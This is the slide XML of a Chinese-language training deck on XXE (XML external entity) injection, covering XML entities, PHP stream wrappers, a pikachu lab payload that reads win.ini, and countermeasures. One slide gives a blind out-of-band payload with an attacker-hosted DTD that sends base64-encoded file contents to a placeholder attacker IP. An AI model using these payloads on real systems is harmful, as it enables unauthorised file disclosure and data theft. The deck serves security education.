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256" r:id="rId3"/>
    <p:sldId id="271" r:id="rId5"/>
    <p:sldId id="272" r:id="rId6"/>
    <p:sldId id="273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9" r:id="rId21"/>
    <p:sldId id="290" r:id="rId22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/>
  <p:cmAuthor id="2" name="ASUS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3F88"/>
    <a:srgbClr val="333333"/>
    <a:srgbClr val="0B4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/>
    <p:restoredTop sz="94084"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr showGuides="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="92" d="100"/>
          <a:sy n="92" d="100"/>
        </p:scale>
        <p:origin x="106" y="67"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2367"/>
        <p:guide pos="3840"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="33" d="100"/>
        <a:sy n="33" d="100"/>
      </p:scale>
      <p:origin x="0" y="-20944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3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FB25B91-0E21-43A0-99BF-C68B11572A2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12C492-2B8C-43C6-A74C-4A410CC2D6D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53E681-7DAD-43E1-B03D-9E59A72F1C7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7038BEC-0B24-4046-901B-81290129590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/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18434" name="文本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lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b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7038BEC-0B24-4046-901B-81290129590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5827549" y="6453337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B100B7C-21FA-4597-9079-2941DAE156CF}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400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32304" y="6048262"/>
            <a:ext cx="3305636" cy="809738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767408" y="335282"/>
            <a:ext cx="70792" cy="83162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340768"/>
            <a:ext cx="5150396" cy="483619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5827549" y="6453337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B100B7C-21FA-4597-9079-2941DAE156CF}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400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32304" y="6048262"/>
            <a:ext cx="3305636" cy="809738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0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6203404" y="1340768"/>
            <a:ext cx="5150396" cy="48361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767408" y="335282"/>
            <a:ext cx="70792" cy="83162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72600" y="6172200"/>
            <a:ext cx="2819400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35282"/>
            <a:ext cx="10515600" cy="831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0768"/>
            <a:ext cx="10515600" cy="4836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3813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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209800" y="3805665"/>
            <a:ext cx="7772400" cy="795337"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4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XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4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外部实体注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="48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XML</a:t>
            </a:r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lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>实体实例演示</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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/>
              <a:t>&lt;?xml version=”1.0” encoding=”utf-8”?&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="28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/>
              <a:t>&lt;!DOCTYPE test[</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="28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/>
              <a:t>&lt;!ENTITY name “zhangsan”&gt;]&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="28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/>
              <a:t>&lt;test&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="28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/>
              <a:t>&lt;name&gt;&amp;name;&lt;/name&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="28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/>
              <a:t>&lt;/test&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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XML</a:t>
            </a:r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lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>实体实例演示</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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/>
              <a:t>&lt;?xml version=”1.0” encoding=”utf-8”?&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="28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/>
              <a:t>&lt;!DOCTYPE test[</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="28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/>
              <a:t>&lt;!ENTITY % name SYSTEM “file:///C:/Windows/win.ini”&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="28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/>
              <a:t>%name;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="28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/>
              <a:t>]&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN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伪协议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0485"/>
            <a:ext cx="10515600" cy="5290820"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="80000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="2800"/>
              <a:t>引用外部的实体，在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>中能写哪些类型的外部实体呢？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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/>
              <a:t>主要的有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>ftp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>等</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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/>
              <a:t>当允许引用外部实体时，通过构造恶意内容，可导致读取任意文件、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>SSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>DOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>等危害</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="280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416810" y="2493010"/>
          <a:ext cx="7358380" cy="2749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595"/>
                <a:gridCol w="1839595"/>
                <a:gridCol w="1839595"/>
                <a:gridCol w="1839595"/>
              </a:tblGrid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libxml2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PHP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JAVA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.NET</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN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file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file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http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file</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN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http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http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https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http</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN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ftp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ftp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ftp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https</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN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php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file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ftp</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN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compress.zlib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jar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compress.bzip2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netdoc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8067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data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mailto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glob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gopher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phar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伪协议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0485"/>
            <a:ext cx="10515600" cy="5290820"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>file://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>协议</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>用途：访问本地系统文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>使用条件：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>alloe_url_fopen:off/on</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>allow_url_include:off/on</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>使用方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>:file://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>文件的绝对路径和文件名</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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伪协议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0485"/>
            <a:ext cx="10515600" cy="5290820"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>php://filter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/>
              <a:t>用途：常用于读取文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>源码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/>
              <a:t>使用条件：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>alloe_url_fopen:off/on</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>allow_url_include:off/on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zh-CN" altLang="en-US" sz="2000"/>
              <a:t>使用方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000"/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?path=php://filter/read=convert.base64-encode/resource=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>文件名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en-US" altLang="zh-CN" sz="2000"/>
              <a:t>filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>协议相对路径和绝对路径都可以使用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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XXE - XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>外部实体注入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altLang="zh-CN" sz="2400"/>
              <a:t>pikachu-XXE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>构造一个恶意的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>，通过外部实体引用从而去获取后台服务器的本地文件信息。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&lt;?xml version=”1.0”?&gt;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&lt;!DOCTYPE test[</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="457200">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>&lt;!ENTITY test SYSTEM “file:///C:/Windows/win.ini”&gt;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]&gt;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&lt;test&gt;&amp;test;&lt;/test&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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XXE - XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>外部实体注入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altLang="zh-CN"/>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>盲注</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="457200">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在许多情况下，攻击者可以将 XXE payload发送到 Web 应用程序，但永远不会返回响应，这被称为带外漏洞(Out-of-band)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="457200">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>利用此类漏洞的过程需要利用参数实体，使攻击者让 XML解析器向攻击者控制的服务器发出额外的请求，以便读取文件的内容。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="457200">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击者要如何利用O0B(带外)技术配合参数实体窃取数据?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XXE - XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>外部实体注入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altLang="zh-CN" sz="2400"/>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>练习靶机</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="457200">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>如果在响应包中无回显又想要读取敏感文件时，可以通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>OOB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>带外注入的方法通过外带数据通道来提取数据，构造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>如下：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="457200">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="圆角矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1235075" y="2637155"/>
            <a:ext cx="9721215" cy="19437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</a:rPr>
              <a:t>&lt;?xml version="1.0"?&gt;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&lt;!DOCTYPE test[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&lt;!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=读取的文件"&gt;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&lt;!ENTITY % dtd SYSTEM "http://攻击者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>端口/a.dtd"&gt;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%dtd;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%xxe;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]&gt;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235075" y="4719955"/>
            <a:ext cx="9721215" cy="12103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</a:rPr>
              <a:t>攻击机部署</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a.dtd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>文件内容：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&lt;!ENTITY % test “&lt;!ENTITY &amp;#x25; xxe SYSTEM ‘http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻击者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>监听端口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/?%file;’&gt;”&gt;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%test;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XXE - XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>外部实体注入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防御</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>禁止解析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>外部实体内容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使用开发语言提供的禁用外部实体的方法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>PHP : libxml_disable_entity_loader(true);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JAVA : DocumentBuilderFactory dbf=DocumentBuilderFactory.newInstance();dbf.setExpandEntityReferences(false);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Python : from lxml import etree xmlData =etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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XXE - XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>外部实体注入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防御</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2450"/>
              <a:t>将Web应用程序需要访问的所有IP及服务列入白名单。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2450"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2450"/>
              <a:t>禁用不需要的请求方法，例如file://、php://filter、dict://等。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2450"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2450"/>
              <a:t>对所有可访问的服务启用强制身份验证。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2450"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2450"/>
              <a:t>对所有发出的 http/https 流量实施异常监控。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2450"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2450"/>
              <a:t>验证应用程序中的所有输入，防止无效的输入到达 XML解析器。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2450"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN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 altLang="zh-CN"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>介绍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XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>实体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PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>伪协议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XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>及利用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XML</a:t>
            </a:r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zh-CN" altLang="en-US"/>
              <a:t>什么是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>代表可扩展标记语言。标记语言是一组代码或者标记，用于描述数字文档中的文本。最著名的标记语言是超文本标记语言</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(HTML)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，用于格式化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>展示网页。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>被设计用来传输和存储数据，不用于表示和展示数据。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XML</a:t>
            </a:r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zh-CN" altLang="en-US"/>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>相比，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>有哪些优势？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>告诉浏览器应用程序文档的外观，而</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>描述文档中的内容。换句话说，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>关注的是信息的组织方式，而不是信息的显示方式。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XML</a:t>
            </a:r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>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
